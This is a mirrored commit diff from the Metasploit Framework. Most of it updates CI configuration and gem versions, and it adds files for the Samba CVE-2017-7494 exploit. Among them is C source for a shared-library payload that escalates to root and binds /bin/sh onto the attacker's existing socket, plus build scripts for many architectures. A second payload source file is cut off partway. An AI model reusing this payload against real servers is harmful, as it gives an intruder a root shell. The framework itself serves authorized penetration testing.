infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #16 from rapid7/master 

Resync with upstream
bug/bundler_fix
Tod Beardsley 2017-06-15 12:55:18 -05:00 committed by GitHub
parent 05e15cee18 c1372456e2
commit b6fd0ce5e3
3610 changed files with 18766 additions and 10787 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
.dockerignore
View File

@ -5,6 +5,10 @@ docker-compose*.yml
docker/
!docker/msfconsole.rc
README.md
.git/
.github/
.ruby-version
.ruby-gemset
.bundle
Gemfile.local
@ -93,3 +97,6 @@ data/meterpreter/ext_server_pivot.*.dll
# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
/metakitty
.vagrant
# no need for rspecs
spec/

3
.gitignore vendored
View File

@ -88,3 +88,6 @@ data/meterpreter/ext_server_pivot.*.dll
# local docker compose overrides
docker-compose.local*
# Ignore python bytecode
*.pyc

21
.travis.yml
View File

@ -16,12 +16,16 @@ rvm:
- '2.4.1'
env:
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
- RAKE_TASKS=spec SPEC_OPTS="--tag content"
- RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
# TODO: restore these tests when the code passes them!
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
- CMD='bundle exec rake spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake spec SPEC_OPTS="--tag ~content"'
matrix:
fast_finish: true
include:
- rvm: ruby-head
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
before_install:
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
- rake --version
@ -29,14 +33,18 @@ before_install:
- ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
- ls -la ./.git/hooks
- ./.git/hooks/post-merge
# Update the bundler
- gem install bundler
before_script:
- cp config/database.yml.travis config/database.yml
- bundle exec rake --version
- bundle exec rake db:create
- bundle exec rake db:migrate
script:
# fail build if db/schema.rb update is not committed
- git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
- git diff --exit-code db/schema.rb
script:
- echo "${CMD}"
- bash -c "${CMD}"
notifications:
irc: "irc.freenode.org#msfnotify"
@ -49,3 +57,6 @@ branches:
except:
- gh-pages
- metakitty
services:
- docker

6
Gemfile
View File

@ -3,10 +3,6 @@ source 'https://rubygems.org'
# spec.add_runtime_dependency '<name>', [<version requirements>]
gemspec name: 'metasploit-framework'
gem 'bit-struct', git: 'https://github.com/busterb/bit-struct', branch: 'ruby-2.4'
gem 'method_source', git: 'https://github.com/banister/method_source', branch: 'master'
gem 'rubyntlm', git: 'https://github.com/WinRb/rubyntlm', branch: 'master'
# separate from test as simplecov is not run on travis-ci
group :coverage do
# code coverage for tests
@ -19,7 +15,7 @@ group :development do
# generating documentation
gem 'yard'
# for development and testing purposes
gem 'pry', git: 'https://github.com/pry/pry', branch: 'master'
gem 'pry'
# module documentation
gem 'octokit'
# metasploit-aggregator as a framework only option for now

2
Gemfile.local.example
View File

@ -27,8 +27,6 @@ end
# Create a custom group
group :local do
# Use pry-debugger to step through code during development
gem 'pry-debugger', '~> 0.2'
# Add the lab gem so that the 'lab' plugin will work again
gem 'lab', '~> 0.2.7'
end

176
Gemfile.lock
View File

@ -1,40 +1,11 @@
GIT
remote: https://github.com/WinRb/rubyntlm
revision: 7e2daf6076ba55a435d3e345498a7df40faa3d49
branch: master
specs:
rubyntlm (0.6.1)
GIT
remote: https://github.com/banister/method_source
revision: 6dcb116e37e20e58f615ffe05a40bbe9a536e44a
branch: master
specs:
method_source (0.8.1)
GIT
remote: https://github.com/busterb/bit-struct
revision: 707133ae6af5420be6fbe29be6baa5fbc929da2e
branch: ruby-2.4
specs:
bit-struct (0.15.0)
GIT
remote: https://github.com/pry/pry
revision: 1f64463184e0a160d0b41d1a1f92b8e2f230278c
branch: master
specs:
pry (0.10.4)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
PATH
remote: .
specs:
metasploit-framework (4.14.13)
metasploit-framework (4.14.27)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
backports
bcrypt
bit-struct
filesize
@ -44,9 +15,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.2.24)
metasploit-payloads (= 1.2.32)
metasploit_data_models
metasploit_payloads-mettle (= 0.1.8)
metasploit_payloads-mettle (= 0.1.9)
msgpack
nessus_rest
net-ssh
@ -56,7 +27,7 @@ PATH
octokit
openssl-ccm
openvas-omp
packetfu (= 1.1.13.pre)
packetfu
patch_finder
pcaprub
pg
@ -64,7 +35,7 @@ PATH
rb-readline
recog
redcarpet
rex-arch (= 0.1.4)
rex-arch
rex-bin_tools
rex-core
rex-encoder
@ -124,7 +95,7 @@ GEM
addressable (2.5.1)
public_suffix (~> 2.0, >= 2.0.2)
arel (6.0.4)
arel-helpers (2.3.0)
arel-helpers (2.4.0)
activerecord (>= 3.1.0, < 6)
aruba (0.14.2)
childprocess (~> 0.5.6)
@ -133,10 +104,12 @@ GEM
ffi (~> 1.9.10)
rspec-expectations (>= 2.99)
thor (~> 0.19)
backports (3.8.0)
bcrypt (3.1.11)
bindata (2.4.0)
bit-struct (0.16)
builder (3.2.3)
capybara (2.13.0)
capybara (2.14.2)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
@ -146,7 +119,7 @@ GEM
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.15.0)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
@ -157,12 +130,12 @@ GEM
multi_test (>= 0.1.2)
cucumber-core (1.5.0)
gherkin (~> 4.0)
cucumber-rails (1.4.5)
cucumber-rails (1.5.0)
capybara (>= 1.1.2, < 3)
cucumber (>= 1.3.8, < 4)
mime-types (>= 1.16, < 4)
mime-types (>= 1.17, < 4)
nokogiri (~> 1.5)
railties (>= 3, < 5.1)
railties (>= 4, < 5.2)
cucumber-wire (0.0.1)
diff-lcs (1.3)
docile (1.1.5)
@ -172,13 +145,13 @@ GEM
factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0)
railties (>= 3.0.0)
faraday (0.12.0.1)
faraday (0.12.1)
multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.3)
gherkin (4.1.1)
google-protobuf (3.2.0.2)
fivemat (1.3.5)
gherkin (4.1.3)
google-protobuf (3.3.0)
googleauth (0.5.1)
faraday (~> 0.9)
jwt (~> 1.4)
@ -187,10 +160,10 @@ GEM
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.2.2)
grpc (1.3.4)
google-protobuf (~> 3.1)
googleauth (~> 0.5.1)
i18n (0.8.1)
i18n (0.8.4)
jsobfu (0.4.2)
rkelly-remix
json (2.1.0)
@ -203,26 +176,27 @@ GEM
nokogiri (>= 1.5.9)
memoist (0.15.0)
metasm (1.0.3)
metasploit-aggregator (0.1.3)
metasploit-aggregator (0.2.1)
grpc
rex-arch
metasploit-concern (2.0.3)
metasploit-concern (2.0.4)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (2.0.8)
metasploit-credential (2.0.10)
metasploit-concern
metasploit-model
metasploit_data_models
pg
railties
rex-socket
rubyntlm
rubyzip
metasploit-model (2.0.3)
metasploit-model (2.0.4)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.2.24)
metasploit-payloads (1.2.32)
metasploit_data_models (2.0.14)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -233,12 +207,13 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.1.8)
metasploit_payloads-mettle (0.1.9)
method_source (0.8.2)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
mini_portile2 (2.1.0)
minitest (5.10.1)
mini_portile2 (2.2.0)
minitest (5.10.2)
msgpack (1.1.0)
multi_json (1.12.1)
multi_test (0.1.2)
@ -247,14 +222,14 @@ GEM
net-ssh (4.1.0)
network_interface (0.0.1)
nexpose (6.0.0)
nokogiri (1.7.1)
mini_portile2 (~> 2.1.0)
nokogiri (1.8.0)
mini_portile2 (~> 2.2.0)
octokit (4.7.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13.pre)
packetfu (1.1.13)
pcaprub
patch_finder (1.0.2)
pcaprub (0.12.4)
@ -264,8 +239,12 @@ GEM
activerecord (>= 4.0.0)
arel (>= 4.0.1)
pg_array_parser (~> 0.0.9)
pry (0.10.4)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
slop (~> 3.4)
public_suffix (2.0.5)
rack (1.6.5)
rack (1.6.8)
rack-test (0.6.3)
rack (>= 1.0)
rails-deprecated_sanitizer (1.0.3)
@ -283,77 +262,78 @@ GEM
thor (>= 0.18.1, < 2.0)
rake (12.0.0)
rb-readline (0.5.4)
recog (2.1.5)
recog (2.1.8)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.4)
rex-arch (0.1.8)
rex-text
rex-bin_tools (0.1.2)
rex-bin_tools (0.1.3)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.9)
rex-encoder (0.1.3)
rex-core (0.1.10)
rex-encoder (0.1.4)
metasm
rex-arch
rex-text
rex-exploitation (0.1.12)
rex-exploitation (0.1.14)
jsobfu
metasm
rex-arch
rex-encoder
rex-text
rex-java (0.1.4)
rex-mime (0.1.4)
rex-java (0.1.5)
rex-mime (0.1.5)
rex-text
rex-nop (0.1.0)
rex-nop (0.1.1)
rex-arch
rex-ole (0.1.5)
rex-ole (0.1.6)
rex-text
rex-powershell (0.1.70)
rex-powershell (0.1.72)
rex-random_identifier
rex-text
rex-random_identifier (0.1.2)
rex-text
rex-registry (0.1.2)
rex-rop_builder (0.1.2)
rex-registry (0.1.3)
rex-rop_builder (0.1.3)
metasm
rex-core
rex-text
rex-socket (0.1.5)
rex-socket (0.1.6)
rex-core
rex-sslscan (0.1.3)
rex-sslscan (0.1.4)
rex-socket
rex-text
rex-struct2 (0.1.1)
rex-text (0.2.14)
rex-zip (0.1.2)
rex-struct2 (0.1.2)
rex-text (0.2.15)
rex-zip (0.1.3)
rex-text
rkelly-remix (0.0.7)
robots (0.10.1)
rspec-core (3.5.4)
rspec-support (~> 3.5.0)
rspec-expectations (3.5.0)
rspec-core (3.6.0)
rspec-support (~> 3.6.0)
rspec-expectations (3.6.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.5.0)
rspec-mocks (3.5.0)
rspec-support (~> 3.6.0)
rspec-mocks (3.6.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.5.0)
rspec-rails (3.5.2)
rspec-support (~> 3.6.0)
rspec-rails (3.6.0)
actionpack (>= 3.0)
activesupport (>= 3.0)
railties (>= 3.0)
rspec-core (~> 3.5.0)
rspec-expectations (~> 3.5.0)
rspec-mocks (~> 3.5.0)
rspec-support (~> 3.5.0)
rspec-support (3.5.0)
ruby_smb (0.0.12)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-support (~> 3.6.0)
rspec-support (3.6.0)
ruby_smb (0.0.18)
bindata
rubyntlm
windows_error
rubyntlm (0.6.2)
rubyzip (1.2.1)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
@ -369,7 +349,8 @@ GEM
docile (~> 1.1.0)
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
simplecov-html (0.10.0)
simplecov-html (0.10.1)
slop (3.6.0)
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.19.4)
@ -379,34 +360,31 @@ GEM
thread_safe (~> 0.1)
tzinfo-data (1.2017.2)
tzinfo (>= 1.0.0)
windows_error (0.1.1)
windows_error (0.1.2)
xmlrpc (0.3.0)
xpath (2.0.0)
xpath (2.1.0)
nokogiri (~> 1.3)
yard (0.9.8)
yard (0.9.9)
PLATFORMS
ruby
DEPENDENCIES
aruba
bit-struct!
cucumber-rails
factory_girl_rails
fivemat
metasploit-aggregator
metasploit-framework!
method_source!
octokit
pry!
pry
rake
redcarpet
rspec-rails
rubyntlm!
shoulda-matchers
simplecov
timecop
yard
BUNDLED WITH
1.14.6
1.15.1

110
LICENSE_GEMS
View File

@ -1,3 +1,4 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT
actionview, 4.2.8, MIT
activemodel, 4.2.8, MIT
@ -5,56 +6,57 @@ activerecord, 4.2.8, MIT
activesupport, 4.2.8, MIT
addressable, 2.5.1, "Apache 2.0"
arel, 6.0.4, MIT
arel-helpers, 2.3.0, unknown
arel-helpers, 2.4.0, unknown
aruba, 0.14.2, MIT
backports, 3.8.0, MIT
bcrypt, 3.1.11, MIT
bindata, 2.3.5, ruby
bit-struct, 0.15.0, ruby
bindata, 2.4.0, ruby
bit-struct, 0.16, ruby
builder, 3.2.3, MIT
bundler, 1.14.6, MIT
capybara, 2.13.0, MIT
bundler, 1.15.0, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
coderay, 1.1.1, MIT
contracts, 0.15.0, "Simplified BSD"
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.4.5, MIT
cucumber-rails, 1.5.0, MIT
cucumber-wire, 0.0.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
docile, 1.1.5, MIT
erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT
faraday, 0.12.0.1, MIT
faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT
gherkin, 4.1.1, MIT
google-protobuf, 3.2.0.2, "New BSD"
gherkin, 4.1.3, MIT
google-protobuf, 3.3.0, "New BSD"
googleauth, 0.5.1, "Apache 2.0"
grpc, 1.2.2, "New BSD"
grpc, 1.3.4, "New BSD"
i18n, 0.8.1, MIT
jsobfu, 0.4.2, "New BSD"
json, 2.0.3, ruby
json, 2.1.0, ruby
jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT
logging, 2.2.0, MIT
logging, 2.2.2, MIT
loofah, 2.0.3, MIT
memoist, 0.15.0, MIT
metasm, 1.0.3, LGPL
metasploit-aggregator, 0.1.3, "New BSD"
metasploit-concern, 2.0.3, "New BSD"
metasploit-credential, 2.0.8, "New BSD"
metasploit-framework, 4.14.9, "New BSD"
metasploit-model, 2.0.3, "New BSD"
metasploit-payloads, 1.2.19, "3-clause (or ""modified"") BSD"
metasploit-aggregator, 0.2.1, "New BSD"
metasploit-concern, 2.0.4, "New BSD"
metasploit-credential, 2.0.9, "New BSD"
metasploit-framework, 4.14.23, "New BSD"
metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD"
metasploit_payloads-mettle, 0.1.8, "3-clause (or ""modified"") BSD"
method_source, 0.8.1, MIT
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
method_source, 0.8.2, MIT
mime-types, 3.1, MIT
mime-types-data, 3.2016.0521, MIT
mini_portile2, 2.1.0, MIT
minitest, 5.10.1, MIT
minitest, 5.10.2, MIT
msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT
multi_test, 0.1.2, MIT
@ -63,12 +65,12 @@ nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT
nexpose, 6.0.0, BSD
nokogiri, 1.7.1, MIT
nokogiri, 1.7.2, MIT
octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT
os, 0.9.6, MIT
packetfu, 1.1.13.pre, BSD
packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1
pg, 0.20.0, "New BSD"
@ -76,7 +78,7 @@ pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT
pry, 0.10.4, MIT
public_suffix, 2.0.5, MIT
rack, 1.6.5, MIT
rack, 1.6.8, MIT
rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT
@ -84,41 +86,42 @@ rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT
rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD
recog, 2.1.5, unknown
recog, 2.1.8, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD"
rex-bin_tools, 0.1.2, "New BSD"
rex-core, 0.1.9, "New BSD"
rex-encoder, 0.1.3, "New BSD"
rex-exploitation, 0.1.12, "New BSD"
rex-java, 0.1.4, "New BSD"
rex-mime, 0.1.4, "New BSD"
rex-nop, 0.1.0, unknown
rex-ole, 0.1.5, "New BSD"
rex-powershell, 0.1.70, "New BSD"
rex-bin_tools, 0.1.3, "New BSD"
rex-core, 0.1.10, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD"
rex-java, 0.1.5, "New BSD"
rex-mime, 0.1.5, "New BSD"
rex-nop, 0.1.1, "New BSD"
rex-ole, 0.1.6, "New BSD"
rex-powershell, 0.1.72, "New BSD"
rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.2, "New BSD"
rex-rop_builder, 0.1.2, "New BSD"
rex-socket, 0.1.5, "New BSD"
rex-sslscan, 0.1.3, "New BSD"
rex-struct2, 0.1.1, "New BSD"
rex-text, 0.2.14, "New BSD"
rex-zip, 0.1.2, "New BSD"
rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.6, "New BSD"
rex-sslscan, 0.1.4, "New BSD"
rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.15, "New BSD"
rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT
rspec-core, 3.5.4, MIT
rspec-expectations, 3.5.0, MIT
rspec-mocks, 3.5.0, MIT
rspec-rails, 3.5.2, MIT
rspec-support, 3.5.0, MIT
ruby_smb, 0.0.8, "New BSD"
rubyntlm, 0.6.1, MIT
rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT
rspec-support, 3.6.0, MIT
ruby_smb, 0.0.17, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT
simplecov-html, 0.10.0, MIT
simplecov-html, 0.10.1, MIT
slop, 3.6.0, MIT
sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT
thor, 0.19.4, MIT
@ -126,6 +129,7 @@ thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.8.1, MIT
tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.1, BSD
xpath, 2.0.0, unknown
yard, 0.9.8, MIT
windows_error, 0.1.2, BSD
xmlrpc, 0.3.0, ruby
xpath, 2.1.0, MIT
yard, 0.9.9, MIT

6
README.md
View File

@ -9,7 +9,7 @@ Bug tracking and development information can be found at:
https://github.com/rapid7/metasploit-framework
New bugs and feature requests should be directed to:
http://r-7.co/MSF-BUGv1
https://r-7.co/MSF-BUGv1
API documentation for writing modules can be found at:
https://rapid7.github.io/metasploit-framework/api
@ -22,7 +22,7 @@ Installing
Generally, you should use [the free installer](https://www.metasploit.com/download),
which contains all of the dependencies and will get you up and running with a
few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
you'd like to deal with dependencies on your own.
Using Metasploit
@ -45,6 +45,6 @@ pull request. For slightly more information, see
[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"

48
data/exploits/CVE-2017-7494/build.sh Executable file
View File

@ -0,0 +1,48 @@
#!/bin/bash
build () {
CC=$1
TARGET_SUFFIX=$2
CFLAGS=$3
echo "[*] Building for ${TARGET_SUFFIX}..."
for type in {shellcode,system,findsock}
do ${CC} ${CFLAGS} -Wall -Werror -fPIC -fno-stack-protector samba-root-${type}.c -shared -o samba-root-${type}-${TARGET_SUFFIX}.so
done
}
rm -f *.o *.so *.gz
#
# Linux GLIBC
#
# x86
build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
# ARM
build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
# MIPS
build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
build "mipsel-linux-gnu-gcc-5" "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
build "mips64-linux-gnuabi64-gcc-5" "linux-glibc-mips64" "-D OLD_LIB_SET_1"
build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
# SPARC
build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
# PowerPC
build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
# S390X
build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
gzip -9 *.so
rm -f *.o *.so

21
data/exploits/CVE-2017-7494/install-deps.sh Executable file
View File

@ -0,0 +1,21 @@
#!/bin/bash
# Assume x86_64 Ubuntu 16.04 base system
apt-get install build-essential \
gcc-5-multilib \
gcc-5-multilib-arm-linux-gnueabi \
gcc-5-multilib-arm-linux-gnueabihf \
gcc-5-multilib-mips-linux-gnu \
gcc-5-multilib-mips64-linux-gnuabi64 \
gcc-5-multilib-mips64el-linux-gnuabi64 \
gcc-5-multilib-mipsel-linux-gnu \
gcc-5-multilib-powerpc-linux-gnu \
gcc-5-multilib-powerpc64-linux-gnu \
gcc-5-multilib-s390x-linux-gnu \
gcc-5-multilib-sparc64-linux-gnu \
gcc-4.9-powerpc64le-linux-gnu \
gcc-4.9-aarch64-linux-gnu
if [ ! -e /usr/include/asm ];
then ln -sf /usr/include/asm-generic /usr/include/asm
fi

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-aarch64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-armel.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-armhf.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-mips.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-mips64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-mips64el.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-mipsel.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-powerpc.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-powerpc64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-powerpc64le.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-s390x.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-sparc.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-sparc64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-x86.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-findsock-linux-glibc-x86_64.so.gz Executable file
View File

Binary file not shown.

67
data/exploits/CVE-2017-7494/samba-root-findsock.c Normal file
View File

@ -0,0 +1,67 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <signal.h>
#include <string.h>
#ifdef OLD_LIB_SET_1
__asm__(".symver execve,execve@GLIBC_2.0");
__asm__(".symver dup2,dup2@GLIBC_2.0");
__asm__(".symver getsockname,getsockname@GLIBC_2.0");
#endif
#ifdef OLD_LIB_SET_2
__asm__(".symver execve,execve@GLIBC_2.2.5");
__asm__(".symver dup2,dup2@GLIBC_2.2.5");
__asm__(".symver getsockname,getsockname@GLIBC_2.2.5");
#endif
extern bool change_to_root_user(void);
// Samba 4 looks for samba_init_module
int samba_init_module(void)
{
char *args[2] = {"/bin/sh", 0};
struct sockaddr_in sa;
socklen_t sl = sizeof(sa);
int s;
unsigned char buff[] = {
0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,
0xa2, 0x39, 0x00, 0x00, 0xc0, 0x88, 0x03, 0xc8,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x64, 0x7e,
0x64, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00
};
change_to_root_user();
for (s=4096; s>0; s--) {
// Skip over invalid sockets
if (getsockname(s, (struct sockaddr *)&sa, &sl) != 0)
continue;
// Skip over non internet sockets
if (sa.sin_family != AF_INET)
continue;
// Send a semi-valid SMB response to simplify things
send(s, buff, sizeof(buff), 0);
// Duplicate standard input/output/error
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
execve(args[0], args, NULL);
}
return 0;
}
// Samba 3 looks for init_samba_module
int init_samba_module(void) { return samba_init_module(); }

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-aarch64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-armel.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-armhf.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-mips.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-mips64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-mips64el.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-mipsel.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-powerpc.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-powerpc64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-powerpc64le.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-s390x.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-sparc.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-sparc64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-x86.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-shellcode-linux-glibc-x86_64.so.gz Executable file
View File

Binary file not shown.

47
data/exploits/CVE-2017-7494/samba-root-shellcode.c Normal file
View File

@ -0,0 +1,47 @@
#include <stdio.h>
#include <stdbool.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
#include <signal.h>
#ifdef OLD_LIB_SET_1
__asm__(".symver mmap,mmap@GLIBC_2.0");
__asm__(".symver memcpy,memcpy@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif
#ifdef OLD_LIB_SET_2
__asm__(".symver mmap,mmap@GLIBC_2.2.5");
__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
